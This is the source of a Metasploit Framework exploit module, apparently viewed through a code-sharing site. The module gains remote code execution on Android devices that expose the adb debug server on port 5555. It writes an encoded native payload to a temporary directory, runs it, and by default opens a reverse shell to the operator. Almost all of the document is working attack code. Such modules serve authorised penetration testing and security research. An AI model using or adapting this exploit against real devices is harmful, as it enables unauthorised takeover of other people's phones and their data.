Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/android/adb/adb_server_exec.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::CmdStager

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Android ADB Debug Server Remote Payload Execution',

17
        'Description' => %q{

18
          Writes and spawns a native payload on an Android device that is listening

19
          for adb debug messages.

20
        },

21
        'Author' => ['joev'],

22
        'License' => MSF_LICENSE,

23
        'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },

24
        'Platform' => 'linux',

25
        'Arch' => [ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE],

26
        'Targets' => [

27
          ['armle', { 'Arch' => ARCH_ARMLE }],

28
          ['x86', { 'Arch' => ARCH_X86 }],

29
          ['x64', { 'Arch' => ARCH_X64 }],

30
          ['mipsle', { 'Arch' => ARCH_MIPSLE }]

31
        ],

32
        'DefaultTarget' => 0,

33
        'DisclosureDate' => '2016-01-01',

34
        'Notes' => {

35
          'SideEffects' => [ ARTIFACTS_ON_DISK ],

36
          'Reliability' => [ REPEATABLE_SESSION ],

37
          'Stability' => [ CRASH_SAFE ]

38
        }

39
      )

40
    )

41


42
    register_options([

43
      Opt::RPORT(5555),

44
      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])

45
    ])

46
  end

47


48
  def check

49
    setup_adb_connection do

50
      device_info = @adb_client.connect.data

51
      print_good("Detected device:\n#{device_info}")

52
      return CheckCode::Vulnerable

53
    end

54


55
    CheckCode::Unknown

56
  end

57


58
  def execute_command(cmd, _opts)

59
    response = @adb_client.exec_cmd(cmd)

60
    print_good("Command executed, response:\n #{response}")

61
  end

62


63
  def exploit

64
    setup_adb_connection do

65
      device_data = @adb_client.connect

66
      print_good("Connected to device:\n#{device_data.data}")

67
      execute_cmdstager({

68
        flavor: :echo,

69
        enc_format: :octal,

70
        prefix: '\\\\0',

71
        temp: datastore['WritableDir'],

72
        linemax: Rex::Proto::ADB::Message::Connect::DEFAULT_MAXDATA - 8,

73
        background: true,

74
        nodelete: true

75
      })

76
    end

77
  end

78


79
  def setup_adb_connection(&blk)

80
    print_status('Connecting to device...')

81
    connect

82
    @adb_client = Rex::Proto::ADB::Client.new(sock)

83
    blk.call

84
  ensure

85
    disconnect

86
  end

87
end

88


89